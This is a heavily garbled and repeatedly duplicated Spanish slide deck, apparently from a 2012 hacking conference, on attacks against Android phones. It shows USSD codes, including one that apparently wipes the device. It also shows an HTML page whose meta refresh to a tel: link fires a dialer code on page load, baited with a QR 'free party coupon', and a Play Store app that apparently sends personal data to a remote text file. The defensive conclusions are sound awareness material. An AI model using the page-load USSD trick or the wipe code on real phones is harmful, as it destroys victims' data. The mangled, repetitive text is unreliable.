Antes de instalar el APK httpwwwel-palomocomlimahackreservationstxt Despueacutes de instalar httpwwwel-palomocomlimahackreservationstxt Creacuteditos
billygradosgmailcom Developer de aplicaciones para
Android
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
EL ATAQUE
Conclusiones
Android es una herramienta muy potente para realizar pruebas baacutesicas de penetracioacuten de sistemas a nivel de sistema operativo y redes LAN
WhatsApp presenta debilidades de seguridad de informacioacuten
importantes El celular nunca se presta Nunca Existen diversas vulnerabilidades en sistemas Android Coacutedigos USSD y a
traveacutes de Metasploit para versiones antiguas de Android Google Play tiene una poliacutetica de seguridad de informacioacuten sin embargo
no verifica que las aplicaciones cumplan con dicha poliacutetica Actualiza tu Android verifica los permisos otorgados a cada aplicacioacuten y
no instales APK files de dudosa procedencia
EL ATAQUE
Coacutedigos USSD
El USSD (acroacutenimo de Unstructured Supplementary Service Data Servicio Suplementario de Datos no Estructurados en ingleacutes) es un servicio para el enviacuteo de datos a traveacutes de moacuteviles GSM al igual que el SMS Es usado normalmente para comunicacioacuten con el proveedor de telefoniacutea generalmente para servicios de mensajeriacutea en tiempo real
Aquiacute algunos coacutedigos USSD 06 150 27673855 (no deberiacuteas ejecutar este)
Coacutedigos USSD
Asiacute como existe los links para enviar correo lta mailtomailmailcom helliphellipgt Enviar email ltagt
Tambieacuten existe el mail para ldquoLLAMARrdquo lta href=tel987654321gtllamar LIMAHACKltagt
Algunos coacutedigos USSD no necesitan la intervencioacuten de ldquomarcadordquo para ser ejecutados simplemente se ejecutan pueden probar esto
06 Entonces que pasa sihelliphellip
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
lthtmlgt ltheadgt lttitlegtFiesta LimaHack 2012lttitlegt ltmeta http-equiv=Refresh content=0url=tel 2797385523 gt ltheadgtltbodygt lthtmlgt
Aplicaciones APK Maliciosas
gt Se han heredado todas las malas costumbres del mundo Windoneano todos instamos dando NEXT NEXT NEXT gt iquestSabemos lo que realmente estamos instalando en nuestro celular
Google Play y la poliacuteticahellip
Informacioacuten personal y confidencial no se permite la divulgacioacuten o la publicacioacuten no autorizada de informacioacuten de caraacutecter privado o confidencial de los usuarios (como nuacutemeros de tarjetas de creacutedito de la Seguridad Social del permiso de conducir o de otros documentos ) ni de cualquier otra informacioacuten que no sea de acceso puacuteblico
El problema es que NADIE lo verifica httpplaygooglecomintlALL_esaboutdeveloper-
content-policyhtml
Instalaremos una aplicacioacuten
httpsplaygooglecomstoreappsdetailsid=comelpalomoreservations
Google Play y la poliacuteticahellip
Antes de instalar el APK httpwwwel-palomocomlimahackreservationstxt Despueacutes de instalar httpwwwel-palomocomlimahackreservationstxt Creacuteditos
billygradosgmailcom Developer de aplicaciones para
Android
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
EL ATAQUE
Conclusiones
Android es una herramienta muy potente para realizar pruebas baacutesicas de penetracioacuten de sistemas a nivel de sistema operativo y redes LAN
WhatsApp presenta debilidades de seguridad de informacioacuten
importantes El celular nunca se presta Nunca Existen diversas vulnerabilidades en sistemas Android Coacutedigos USSD y a
traveacutes de Metasploit para versiones antiguas de Android Google Play tiene una poliacutetica de seguridad de informacioacuten sin embargo
no verifica que las aplicaciones cumplan con dicha poliacutetica Actualiza tu Android verifica los permisos otorgados a cada aplicacioacuten y
no instales APK files de dudosa procedencia
Coacutedigos USSD
El USSD (acroacutenimo de Unstructured Supplementary Service Data Servicio Suplementario de Datos no Estructurados en ingleacutes) es un servicio para el enviacuteo de datos a traveacutes de moacuteviles GSM al igual que el SMS Es usado normalmente para comunicacioacuten con el proveedor de telefoniacutea generalmente para servicios de mensajeriacutea en tiempo real
Aquiacute algunos coacutedigos USSD 06 150 27673855 (no deberiacuteas ejecutar este)
Coacutedigos USSD
Asiacute como existe los links para enviar correo lta mailtomailmailcom helliphellipgt Enviar email ltagt
Tambieacuten existe el mail para ldquoLLAMARrdquo lta href=tel987654321gtllamar LIMAHACKltagt
Algunos coacutedigos USSD no necesitan la intervencioacuten de ldquomarcadordquo para ser ejecutados simplemente se ejecutan pueden probar esto
06 Entonces que pasa sihelliphellip
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
lthtmlgt ltheadgt lttitlegtFiesta LimaHack 2012lttitlegt ltmeta http-equiv=Refresh content=0url=tel 2797385523 gt ltheadgtltbodygt lthtmlgt
Aplicaciones APK Maliciosas
gt Se han heredado todas las malas costumbres del mundo Windoneano todos instamos dando NEXT NEXT NEXT gt iquestSabemos lo que realmente estamos instalando en nuestro celular
Google Play y la poliacuteticahellip
Informacioacuten personal y confidencial no se permite la divulgacioacuten o la publicacioacuten no autorizada de informacioacuten de caraacutecter privado o confidencial de los usuarios (como nuacutemeros de tarjetas de creacutedito de la Seguridad Social del permiso de conducir o de otros documentos ) ni de cualquier otra informacioacuten que no sea de acceso puacuteblico
El problema es que NADIE lo verifica httpplaygooglecomintlALL_esaboutdeveloper-
content-policyhtml
Instalaremos una aplicacioacuten
httpsplaygooglecomstoreappsdetailsid=comelpalomoreservations
Google Play y la poliacuteticahellip
Antes de instalar el APK httpwwwel-palomocomlimahackreservationstxt Despueacutes de instalar httpwwwel-palomocomlimahackreservationstxt Creacuteditos
billygradosgmailcom Developer de aplicaciones para
Android
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
EL ATAQUE
Conclusiones
Android es una herramienta muy potente para realizar pruebas baacutesicas de penetracioacuten de sistemas a nivel de sistema operativo y redes LAN
WhatsApp presenta debilidades de seguridad de informacioacuten
importantes El celular nunca se presta Nunca Existen diversas vulnerabilidades en sistemas Android Coacutedigos USSD y a
traveacutes de Metasploit para versiones antiguas de Android Google Play tiene una poliacutetica de seguridad de informacioacuten sin embargo
no verifica que las aplicaciones cumplan con dicha poliacutetica Actualiza tu Android verifica los permisos otorgados a cada aplicacioacuten y
no instales APK files de dudosa procedencia
Coacutedigos USSD
Asiacute como existe los links para enviar correo lta mailtomailmailcom helliphellipgt Enviar email ltagt
Tambieacuten existe el mail para ldquoLLAMARrdquo lta href=tel987654321gtllamar LIMAHACKltagt
Algunos coacutedigos USSD no necesitan la intervencioacuten de ldquomarcadordquo para ser ejecutados simplemente se ejecutan pueden probar esto
06 Entonces que pasa sihelliphellip
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
lthtmlgt ltheadgt lttitlegtFiesta LimaHack 2012lttitlegt ltmeta http-equiv=Refresh content=0url=tel 2797385523 gt ltheadgtltbodygt lthtmlgt
Aplicaciones APK Maliciosas
gt Se han heredado todas las malas costumbres del mundo Windoneano todos instamos dando NEXT NEXT NEXT gt iquestSabemos lo que realmente estamos instalando en nuestro celular
Google Play y la poliacuteticahellip
Informacioacuten personal y confidencial no se permite la divulgacioacuten o la publicacioacuten no autorizada de informacioacuten de caraacutecter privado o confidencial de los usuarios (como nuacutemeros de tarjetas de creacutedito de la Seguridad Social del permiso de conducir o de otros documentos ) ni de cualquier otra informacioacuten que no sea de acceso puacuteblico
El problema es que NADIE lo verifica httpplaygooglecomintlALL_esaboutdeveloper-
content-policyhtml
Instalaremos una aplicacioacuten
httpsplaygooglecomstoreappsdetailsid=comelpalomoreservations
Google Play y la poliacuteticahellip
Antes de instalar el APK httpwwwel-palomocomlimahackreservationstxt Despueacutes de instalar httpwwwel-palomocomlimahackreservationstxt Creacuteditos
billygradosgmailcom Developer de aplicaciones para
Android
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
EL ATAQUE
Conclusiones
Android es una herramienta muy potente para realizar pruebas baacutesicas de penetracioacuten de sistemas a nivel de sistema operativo y redes LAN
WhatsApp presenta debilidades de seguridad de informacioacuten
importantes El celular nunca se presta Nunca Existen diversas vulnerabilidades en sistemas Android Coacutedigos USSD y a
traveacutes de Metasploit para versiones antiguas de Android Google Play tiene una poliacutetica de seguridad de informacioacuten sin embargo
no verifica que las aplicaciones cumplan con dicha poliacutetica Actualiza tu Android verifica los permisos otorgados a cada aplicacioacuten y
no instales APK files de dudosa procedencia
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
lthtmlgt ltheadgt lttitlegtFiesta LimaHack 2012lttitlegt ltmeta http-equiv=Refresh content=0url=tel 2797385523 gt ltheadgtltbodygt lthtmlgt
Aplicaciones APK Maliciosas
gt Se han heredado todas las malas costumbres del mundo Windoneano todos instamos dando NEXT NEXT NEXT gt iquestSabemos lo que realmente estamos instalando en nuestro celular
Google Play y la poliacuteticahellip
Informacioacuten personal y confidencial no se permite la divulgacioacuten o la publicacioacuten no autorizada de informacioacuten de caraacutecter privado o confidencial de los usuarios (como nuacutemeros de tarjetas de creacutedito de la Seguridad Social del permiso de conducir o de otros documentos ) ni de cualquier otra informacioacuten que no sea de acceso puacuteblico
El problema es que NADIE lo verifica httpplaygooglecomintlALL_esaboutdeveloper-
content-policyhtml
Instalaremos una aplicacioacuten
httpsplaygooglecomstoreappsdetailsid=comelpalomoreservations
Google Play y la poliacuteticahellip
Antes de instalar el APK httpwwwel-palomocomlimahackreservationstxt Despueacutes de instalar httpwwwel-palomocomlimahackreservationstxt Creacuteditos
billygradosgmailcom Developer de aplicaciones para
Android
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
EL ATAQUE
Conclusiones
Android es una herramienta muy potente para realizar pruebas baacutesicas de penetracioacuten de sistemas a nivel de sistema operativo y redes LAN
WhatsApp presenta debilidades de seguridad de informacioacuten
importantes El celular nunca se presta Nunca Existen diversas vulnerabilidades en sistemas Android Coacutedigos USSD y a
traveacutes de Metasploit para versiones antiguas de Android Google Play tiene una poliacutetica de seguridad de informacioacuten sin embargo
no verifica que las aplicaciones cumplan con dicha poliacutetica Actualiza tu Android verifica los permisos otorgados a cada aplicacioacuten y
no instales APK files de dudosa procedencia
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
lthtmlgt ltheadgt lttitlegtFiesta LimaHack 2012lttitlegt ltmeta http-equiv=Refresh content=0url=tel 2797385523 gt ltheadgtltbodygt lthtmlgt
Aplicaciones APK Maliciosas
gt Se han heredado todas las malas costumbres del mundo Windoneano todos instamos dando NEXT NEXT NEXT gt iquestSabemos lo que realmente estamos instalando en nuestro celular
Google Play y la poliacuteticahellip
Informacioacuten personal y confidencial no se permite la divulgacioacuten o la publicacioacuten no autorizada de informacioacuten de caraacutecter privado o confidencial de los usuarios (como nuacutemeros de tarjetas de creacutedito de la Seguridad Social del permiso de conducir o de otros documentos ) ni de cualquier otra informacioacuten que no sea de acceso puacuteblico
El problema es que NADIE lo verifica httpplaygooglecomintlALL_esaboutdeveloper-
content-policyhtml
Instalaremos una aplicacioacuten
httpsplaygooglecomstoreappsdetailsid=comelpalomoreservations
Google Play y la poliacuteticahellip
Antes de instalar el APK httpwwwel-palomocomlimahackreservationstxt Despueacutes de instalar httpwwwel-palomocomlimahackreservationstxt Creacuteditos
billygradosgmailcom Developer de aplicaciones para
Android
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
EL ATAQUE
Conclusiones
Android es una herramienta muy potente para realizar pruebas baacutesicas de penetracioacuten de sistemas a nivel de sistema operativo y redes LAN
WhatsApp presenta debilidades de seguridad de informacioacuten
importantes El celular nunca se presta Nunca Existen diversas vulnerabilidades en sistemas Android Coacutedigos USSD y a
traveacutes de Metasploit para versiones antiguas de Android Google Play tiene una poliacutetica de seguridad de informacioacuten sin embargo
no verifica que las aplicaciones cumplan con dicha poliacutetica Actualiza tu Android verifica los permisos otorgados a cada aplicacioacuten y
no instales APK files de dudosa procedencia
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
lthtmlgt ltheadgt lttitlegtFiesta LimaHack 2012lttitlegt ltmeta http-equiv=Refresh content=0url=tel 2797385523 gt ltheadgtltbodygt lthtmlgt
Aplicaciones APK Maliciosas
gt Se han heredado todas las malas costumbres del mundo Windoneano todos instamos dando NEXT NEXT NEXT gt iquestSabemos lo que realmente estamos instalando en nuestro celular
Google Play y la poliacuteticahellip
Informacioacuten personal y confidencial no se permite la divulgacioacuten o la publicacioacuten no autorizada de informacioacuten de caraacutecter privado o confidencial de los usuarios (como nuacutemeros de tarjetas de creacutedito de la Seguridad Social del permiso de conducir o de otros documentos ) ni de cualquier otra informacioacuten que no sea de acceso puacuteblico
El problema es que NADIE lo verifica httpplaygooglecomintlALL_esaboutdeveloper-
content-policyhtml
Instalaremos una aplicacioacuten
httpsplaygooglecomstoreappsdetailsid=comelpalomoreservations
Google Play y la poliacuteticahellip
Antes de instalar el APK httpwwwel-palomocomlimahackreservationstxt Despueacutes de instalar httpwwwel-palomocomlimahackreservationstxt Creacuteditos
billygradosgmailcom Developer de aplicaciones para
Android
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
EL ATAQUE
Conclusiones
Android es una herramienta muy potente para realizar pruebas baacutesicas de penetracioacuten de sistemas a nivel de sistema operativo y redes LAN
WhatsApp presenta debilidades de seguridad de informacioacuten
importantes El celular nunca se presta Nunca Existen diversas vulnerabilidades en sistemas Android Coacutedigos USSD y a
traveacutes de Metasploit para versiones antiguas de Android Google Play tiene una poliacutetica de seguridad de informacioacuten sin embargo
no verifica que las aplicaciones cumplan con dicha poliacutetica Actualiza tu Android verifica los permisos otorgados a cada aplicacioacuten y
no instales APK files de dudosa procedencia
EL ATAQUE
lthtmlgt ltheadgt lttitlegtFiesta LimaHack 2012lttitlegt ltmeta http-equiv=Refresh content=0url=tel 2797385523 gt ltheadgtltbodygt lthtmlgt
Aplicaciones APK Maliciosas
gt Se han heredado todas las malas costumbres del mundo Windoneano todos instamos dando NEXT NEXT NEXT gt iquestSabemos lo que realmente estamos instalando en nuestro celular
Google Play y la poliacuteticahellip
Informacioacuten personal y confidencial no se permite la divulgacioacuten o la publicacioacuten no autorizada de informacioacuten de caraacutecter privado o confidencial de los usuarios (como nuacutemeros de tarjetas de creacutedito de la Seguridad Social del permiso de conducir o de otros documentos ) ni de cualquier otra informacioacuten que no sea de acceso puacuteblico
El problema es que NADIE lo verifica httpplaygooglecomintlALL_esaboutdeveloper-
content-policyhtml
Instalaremos una aplicacioacuten
httpsplaygooglecomstoreappsdetailsid=comelpalomoreservations
Google Play y la poliacuteticahellip
Antes de instalar el APK httpwwwel-palomocomlimahackreservationstxt Despueacutes de instalar httpwwwel-palomocomlimahackreservationstxt Creacuteditos
billygradosgmailcom Developer de aplicaciones para
Android
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
EL ATAQUE
Conclusiones
Android es una herramienta muy potente para realizar pruebas baacutesicas de penetracioacuten de sistemas a nivel de sistema operativo y redes LAN
WhatsApp presenta debilidades de seguridad de informacioacuten
importantes El celular nunca se presta Nunca Existen diversas vulnerabilidades en sistemas Android Coacutedigos USSD y a
traveacutes de Metasploit para versiones antiguas de Android Google Play tiene una poliacutetica de seguridad de informacioacuten sin embargo
no verifica que las aplicaciones cumplan con dicha poliacutetica Actualiza tu Android verifica los permisos otorgados a cada aplicacioacuten y
no instales APK files de dudosa procedencia
Aplicaciones APK Maliciosas
gt Se han heredado todas las malas costumbres del mundo Windoneano todos instamos dando NEXT NEXT NEXT gt iquestSabemos lo que realmente estamos instalando en nuestro celular
Google Play y la poliacuteticahellip
Informacioacuten personal y confidencial no se permite la divulgacioacuten o la publicacioacuten no autorizada de informacioacuten de caraacutecter privado o confidencial de los usuarios (como nuacutemeros de tarjetas de creacutedito de la Seguridad Social del permiso de conducir o de otros documentos ) ni de cualquier otra informacioacuten que no sea de acceso puacuteblico
El problema es que NADIE lo verifica httpplaygooglecomintlALL_esaboutdeveloper-
content-policyhtml
Instalaremos una aplicacioacuten
httpsplaygooglecomstoreappsdetailsid=comelpalomoreservations
Google Play y la poliacuteticahellip
Antes de instalar el APK httpwwwel-palomocomlimahackreservationstxt Despueacutes de instalar httpwwwel-palomocomlimahackreservationstxt Creacuteditos
billygradosgmailcom Developer de aplicaciones para
Android
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
EL ATAQUE
Conclusiones
Android es una herramienta muy potente para realizar pruebas baacutesicas de penetracioacuten de sistemas a nivel de sistema operativo y redes LAN
WhatsApp presenta debilidades de seguridad de informacioacuten
importantes El celular nunca se presta Nunca Existen diversas vulnerabilidades en sistemas Android Coacutedigos USSD y a
traveacutes de Metasploit para versiones antiguas de Android Google Play tiene una poliacutetica de seguridad de informacioacuten sin embargo
no verifica que las aplicaciones cumplan con dicha poliacutetica Actualiza tu Android verifica los permisos otorgados a cada aplicacioacuten y
no instales APK files de dudosa procedencia
Google Play y la poliacuteticahellip
Informacioacuten personal y confidencial no se permite la divulgacioacuten o la publicacioacuten no autorizada de informacioacuten de caraacutecter privado o confidencial de los usuarios (como nuacutemeros de tarjetas de creacutedito de la Seguridad Social del permiso de conducir o de otros documentos ) ni de cualquier otra informacioacuten que no sea de acceso puacuteblico
El problema es que NADIE lo verifica httpplaygooglecomintlALL_esaboutdeveloper-
content-policyhtml
Instalaremos una aplicacioacuten
httpsplaygooglecomstoreappsdetailsid=comelpalomoreservations
Google Play y la poliacuteticahellip
Antes de instalar el APK httpwwwel-palomocomlimahackreservationstxt Despueacutes de instalar httpwwwel-palomocomlimahackreservationstxt Creacuteditos
billygradosgmailcom Developer de aplicaciones para
Android
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
EL ATAQUE
Conclusiones
Android es una herramienta muy potente para realizar pruebas baacutesicas de penetracioacuten de sistemas a nivel de sistema operativo y redes LAN
WhatsApp presenta debilidades de seguridad de informacioacuten
importantes El celular nunca se presta Nunca Existen diversas vulnerabilidades en sistemas Android Coacutedigos USSD y a
traveacutes de Metasploit para versiones antiguas de Android Google Play tiene una poliacutetica de seguridad de informacioacuten sin embargo
no verifica que las aplicaciones cumplan con dicha poliacutetica Actualiza tu Android verifica los permisos otorgados a cada aplicacioacuten y
no instales APK files de dudosa procedencia
Instalaremos una aplicacioacuten
httpsplaygooglecomstoreappsdetailsid=comelpalomoreservations
Google Play y la poliacuteticahellip
Antes de instalar el APK httpwwwel-palomocomlimahackreservationstxt Despueacutes de instalar httpwwwel-palomocomlimahackreservationstxt Creacuteditos
billygradosgmailcom Developer de aplicaciones para
Android
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
EL ATAQUE
Conclusiones
Android es una herramienta muy potente para realizar pruebas baacutesicas de penetracioacuten de sistemas a nivel de sistema operativo y redes LAN
WhatsApp presenta debilidades de seguridad de informacioacuten
importantes El celular nunca se presta Nunca Existen diversas vulnerabilidades en sistemas Android Coacutedigos USSD y a
traveacutes de Metasploit para versiones antiguas de Android Google Play tiene una poliacutetica de seguridad de informacioacuten sin embargo
no verifica que las aplicaciones cumplan con dicha poliacutetica Actualiza tu Android verifica los permisos otorgados a cada aplicacioacuten y
no instales APK files de dudosa procedencia
Google Play y la poliacuteticahellip
Antes de instalar el APK httpwwwel-palomocomlimahackreservationstxt Despueacutes de instalar httpwwwel-palomocomlimahackreservationstxt Creacuteditos
billygradosgmailcom Developer de aplicaciones para
Android
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
EL ATAQUE
Conclusiones
Android es una herramienta muy potente para realizar pruebas baacutesicas de penetracioacuten de sistemas a nivel de sistema operativo y redes LAN
WhatsApp presenta debilidades de seguridad de informacioacuten
importantes El celular nunca se presta Nunca Existen diversas vulnerabilidades en sistemas Android Coacutedigos USSD y a
traveacutes de Metasploit para versiones antiguas de Android Google Play tiene una poliacutetica de seguridad de informacioacuten sin embargo
no verifica que las aplicaciones cumplan con dicha poliacutetica Actualiza tu Android verifica los permisos otorgados a cada aplicacioacuten y
no instales APK files de dudosa procedencia
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
EL ATAQUE
Conclusiones
Android es una herramienta muy potente para realizar pruebas baacutesicas de penetracioacuten de sistemas a nivel de sistema operativo y redes LAN
WhatsApp presenta debilidades de seguridad de informacioacuten
importantes El celular nunca se presta Nunca Existen diversas vulnerabilidades en sistemas Android Coacutedigos USSD y a
traveacutes de Metasploit para versiones antiguas de Android Google Play tiene una poliacutetica de seguridad de informacioacuten sin embargo
no verifica que las aplicaciones cumplan con dicha poliacutetica Actualiza tu Android verifica los permisos otorgados a cada aplicacioacuten y
no instales APK files de dudosa procedencia
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
EL ATAQUE
Conclusiones
Android es una herramienta muy potente para realizar pruebas baacutesicas de penetracioacuten de sistemas a nivel de sistema operativo y redes LAN
WhatsApp presenta debilidades de seguridad de informacioacuten
importantes El celular nunca se presta Nunca Existen diversas vulnerabilidades en sistemas Android Coacutedigos USSD y a
traveacutes de Metasploit para versiones antiguas de Android Google Play tiene una poliacutetica de seguridad de informacioacuten sin embargo
no verifica que las aplicaciones cumplan con dicha poliacutetica Actualiza tu Android verifica los permisos otorgados a cada aplicacioacuten y
no instales APK files de dudosa procedencia
Google Play y la poliacuteticahellip
EL ATAQUE
Conclusiones
Android es una herramienta muy potente para realizar pruebas baacutesicas de penetracioacuten de sistemas a nivel de sistema operativo y redes LAN
WhatsApp presenta debilidades de seguridad de informacioacuten
importantes El celular nunca se presta Nunca Existen diversas vulnerabilidades en sistemas Android Coacutedigos USSD y a
traveacutes de Metasploit para versiones antiguas de Android Google Play tiene una poliacutetica de seguridad de informacioacuten sin embargo
no verifica que las aplicaciones cumplan con dicha poliacutetica Actualiza tu Android verifica los permisos otorgados a cada aplicacioacuten y
no instales APK files de dudosa procedencia
EL ATAQUE
Conclusiones
Android es una herramienta muy potente para realizar pruebas baacutesicas de penetracioacuten de sistemas a nivel de sistema operativo y redes LAN
WhatsApp presenta debilidades de seguridad de informacioacuten
importantes El celular nunca se presta Nunca Existen diversas vulnerabilidades en sistemas Android Coacutedigos USSD y a
traveacutes de Metasploit para versiones antiguas de Android Google Play tiene una poliacutetica de seguridad de informacioacuten sin embargo
no verifica que las aplicaciones cumplan con dicha poliacutetica Actualiza tu Android verifica los permisos otorgados a cada aplicacioacuten y
no instales APK files de dudosa procedencia
Conclusiones
Android es una herramienta muy potente para realizar pruebas baacutesicas de penetracioacuten de sistemas a nivel de sistema operativo y redes LAN
WhatsApp presenta debilidades de seguridad de informacioacuten
importantes El celular nunca se presta Nunca Existen diversas vulnerabilidades en sistemas Android Coacutedigos USSD y a
traveacutes de Metasploit para versiones antiguas de Android Google Play tiene una poliacutetica de seguridad de informacioacuten sin embargo
no verifica que las aplicaciones cumplan con dicha poliacutetica Actualiza tu Android verifica los permisos otorgados a cada aplicacioacuten y
no instales APK files de dudosa procedencia